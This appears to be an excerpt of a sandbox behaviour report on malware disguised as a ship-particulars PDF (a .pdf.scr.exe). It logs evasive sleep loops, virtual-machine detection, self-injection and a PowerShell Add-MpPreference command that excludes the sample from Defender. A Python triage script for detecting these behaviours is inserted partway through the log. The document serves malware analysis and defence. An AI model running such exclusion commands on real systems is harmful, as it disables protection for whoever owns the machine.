                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599234
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599125
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599016
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598906
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598797
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598687
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598578
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598468
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598359
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598250
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598122
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597937
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597625
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597515
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597406
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597297
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597187
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597078
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596969
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596844
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596734
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596625
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596516
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596406
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596297
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596187
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596078
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595969
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595859
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595750
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595640
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595531
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595422
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595312
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595203
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595094
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594983
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594875
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594765
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594656
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594547
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594437
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594328
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594219
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2376
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 823
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Window / User API: threadDelayed 1867
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Window / User API: threadDelayed 7987
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 6780 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -25825441703193356s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 5680 | Thread sleep count: 1867 > 30
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 5680 | Thread sleep count: 7987 > 30
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599781s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599672s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599562s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599453s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599344s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599234s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599125s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599016s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598906s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598797s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598687s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598578s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598468s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598359s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598250s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -598122s >= -30000s
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -597078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -596078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -595094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594983s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584Thread sleep time: -594219s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599672
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599344
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599016
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598797
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598687
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598578
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598359
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598250
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 598122
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597937
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597625
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597515
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597406
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597297
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597187
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 597078
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596969
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596844
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596734
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596625
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596516
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596406
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596297
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596187
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 596078
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595969
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595859
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595750
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595640
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595531
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595422
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595312
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595203
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 595094
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594983
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594875
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594765
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594656
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594547
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594437
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594328
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 594219
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1824315473.0000000007187000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000002.1824315473.0000000007187000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4187413405.0000000001073000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory written: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
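The evidence above reduces to three machine-checkable patterns: a thread that sleeps for the maximum .NET timeout and another that counts down from 600000 in ~109 ms steps (a re-sleep-until-deadline loop), a PowerShell child that adds the sample's own path as a Defender exclusion, and an MZ header written into the sample's own image base (the self-injection at 0x400000). The following triage script is an added example, not Joe Sandbox code: it parses evidence lines written as "Source: <process> | <event>" and returns those findings. The sample lines are constructed from this report's own rows; reading the sleep values as milliseconds despite the report's "s" suffix, and reading 922337203685477 (Int64.MaxValue divided by 10000) as the .NET "wait forever" timeout converted from ticks, are the author's assumptions.

```python
"""Triage helper for sandbox behaviour lines (added example, not Joe Sandbox code).

Reads evidence lines in the "Source: <process> | <event>" shape and flags
three behaviours this report shows: evasive thread sleeps (including
countdown loops), Defender exclusions added with Add-MpPreference, and a
PE image written into a process at its image base (MZ header, 4D5A).
"""
import re
from collections import defaultdict

# Constructed sample: evidence lines copied from this report, with the
# source cell and the event cell joined by " | ".
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 6780 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 4584 | Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe TID: 5680 | Thread sleep count: 1867 > 30
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory written: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe base: 400000 value starts with: 4D5A
"""

SLEEP_RE = re.compile(r"TID: (\d+) \| Thread sleep time: -(\d+)s >= -(\d+)s")
EXCLUSION_RE = re.compile(r'Add-MpPreference\s+-ExclusionPath\s+"([^"]+)"')
INJECT_RE = re.compile(r"Memory written: (.+?) base: ([0-9A-Fa-f]+) value starts with: 4D5A")

# Sleep values are read as milliseconds despite the report's "s" suffix
# (assumption). 922337203685477 is Int64.MaxValue // 10000, i.e. the .NET
# "wait forever" timeout converted from 100 ns ticks to ms (interpretation).
INFINITE_MS = 9223372036854775807 // 10000


def parse_sleeps(lines):
    """Map TID -> list of sleep intervals (ms) in report order."""
    per_tid = defaultdict(list)
    for line in lines:
        m = SLEEP_RE.search(line)
        if m:
            per_tid[int(m.group(1))].append(int(m.group(2)))
    return dict(per_tid)


def classify_sleeps(per_tid, long_ms=30_000):
    """Per thread: infinite waits, long sleeps, and countdown loops.

    A countdown loop is a strictly decreasing run of at least three delays,
    the shape of code that re-sleeps for "deadline minus now" until a timer
    expires (the ~109 ms steps down from 600000 in this report).
    """
    findings = {}
    for tid, delays in per_tid.items():
        finite = [d for d in delays if d < INFINITE_MS]
        countdown = len(finite) >= 3 and all(
            a > b for a, b in zip(finite, finite[1:]))
        findings[tid] = {
            "infinite_wait": any(d >= INFINITE_MS for d in delays),
            "max_sleep_ms": max(finite, default=0),
            "total_sleep_ms": sum(finite),
            "long_sleep": any(d >= long_ms for d in finite),
            "countdown_loop": countdown,
        }
    return findings


def defender_exclusions(lines):
    """Paths removed from Defender scanning via Add-MpPreference."""
    return [m.group(1) for m in map(EXCLUSION_RE.search, lines) if m]


def injected_images(lines):
    """(target process, base address) pairs where an MZ header was written."""
    hits = []
    for line in lines:
        m = INJECT_RE.search(line)
        if m:
            hits.append((m.group(1), int(m.group(2), 16)))
    return hits


def triage(text):
    """Summarise one report's evidence lines into triage findings."""
    lines = text.strip().splitlines()
    sleeps = classify_sleeps(parse_sleeps(lines))
    return {
        "evasive_sleep_tids": sorted(
            t for t, f in sleeps.items() if f["long_sleep"] or f["infinite_wait"]),
        "countdown_tids": sorted(t for t, f in sleeps.items() if f["countdown_loop"]),
        "defender_exclusions": defender_exclusions(lines),
        "injected_images": injected_images(lines),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

On the sample, the script reports TIDs 4584 and 6780 as evasive sleepers, 4584 as a countdown loop, the sample's own path as a Defender exclusion, and an MZ image written to the sample at 0x400000. For a live host the same three findings map to things a responder can check directly: Get-MpPreference exposes the ExclusionPath list the Add-MpPreference call modified, and a process whose image base has been overwritten with a new MZ header is the classic hollowing/self-injection indicator for a suspended-then-resumed child.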
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
